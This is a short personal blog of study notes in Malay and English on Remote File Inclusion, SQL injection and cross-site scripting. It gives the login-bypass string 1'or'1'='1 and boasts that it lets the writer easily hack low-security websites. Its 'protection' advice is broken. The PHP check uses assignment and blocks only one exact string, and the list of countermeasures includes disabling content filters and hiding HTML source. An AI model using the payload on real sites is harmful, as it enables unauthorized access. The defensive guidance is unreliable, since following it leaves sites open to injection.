Notes -> Remote File Inclusion

11:21 PM | 0 Comments

Ianya merupakan satu teknik yang digunakan untuk menceroboh website internet daripada
remote computer.

Notes -> Remote SQL Injection

5:20 PM | 0 Comments

Sql injection
*Salau sql injection, ianya akan berlaku pada menu login untuk kita dapatkan username dan password

Remote SQL Injection
Ianya berlaku pada bahagian url @ address di mana kita akan "paste"kan injection pada text area url utk dapatkan username dan password
dimana:
username = plaintext
passwoord = hash (r7hy89p10) ::> yg x bole difahami
utk dptkan pswrd kita kena dapatkan md5 coder @ base64 coder

Notes -> XSS @ Cross Site Script

8:03 PM | 0 Comments

Ia merupakan satu teknik yang digunakan oleh attacker untuk hantar sebarang script pada web user. XSS biasanya berlaku pada aplikasi web. Script yang biasa digunakan oleh XSS ialah java script @ vb script. Biasanya XSS ini digunakan untuk mencuri cookies pada mana-mana website.

example:

XSS berlaku pada ->

RFI berlaku pada ->

Notes -> Continue * SQL Injection

8:33 PM | 0 Comments

Ways how to protect from sql injection

1. Kita gunakan if...else statement pada bahagian login
2. Escape from all single quote ('')

example:

Username : 1'or'1'='1
Password : 1'or'1'='1

$SqL="Select namapenyelia, tahap_penyelia, id_penyelia
from penyelia where username='$name' and password='$pass'

if($name="1'or'1'='1"){break;} ->mana-mana username yang ada "quote" kita reject

Tujuan if...else statement adalah untuk :

1.Check $name (variable) contain.
2.Reject kalau ada single quote.

Another way to protect your website:

1. Encrypt HTML files and hide source code
2. Disable content filters
3. Block website rippers
4. Customize HTML and add some effects

more info ->http://www.aerotags.com/products/tlp.php

Notes -> SQL Injection

12:06 AM | 0 Comments

SQL injection is a type of security exploit in which the attacker adds Structured Query Language (SQL) code to a Web form input box to gain access to resources or make changes to data. An SQL query is a request for some action to be performed on a database. Typically, on a Web form for user authentication, when a user enters their name and password into the text boxes provided for them, those values are inserted into a SELECT query. If the values entered are found as expected, the user is allowed access; if they aren't found, access is denied. However, most Web forms have no mechanisms in place to block input other than names and passwords. Unless such precautions are taken, an attacker can use the input boxes to send their own request to the database, which could allow them to download the entire database or interact with it in other illicit ways.

Notes -> Maqic Quote

10:54 PM | 0 Comments

1' or '1' = '1

By using this magic quote...we easily can hack many website that are having low security

Happy Chinese New Year

11:59 PM | 0 Comments

cuti 4 ari...nak balik kampung...bestnyer...nnt next week aku edit dis page k...

About